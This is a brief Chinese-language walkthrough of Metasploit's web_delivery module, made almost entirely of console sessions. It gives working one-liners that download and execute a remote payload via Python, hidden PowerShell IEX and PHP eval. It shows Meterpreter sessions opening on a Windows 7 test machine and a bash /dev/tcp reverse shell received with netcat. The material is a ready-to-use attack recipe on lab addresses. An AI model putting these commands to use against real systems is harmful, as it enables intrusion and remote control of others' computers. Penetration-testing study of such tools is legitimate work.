Metasploit Web Delivery

Metasploit的模块Web Delivery用于在Kali上启动Server服务,访问内容包含Payload。

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

在测试机执行该Python

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

 

测试机执行该powershell语句

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

 

获取到反弹shell

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671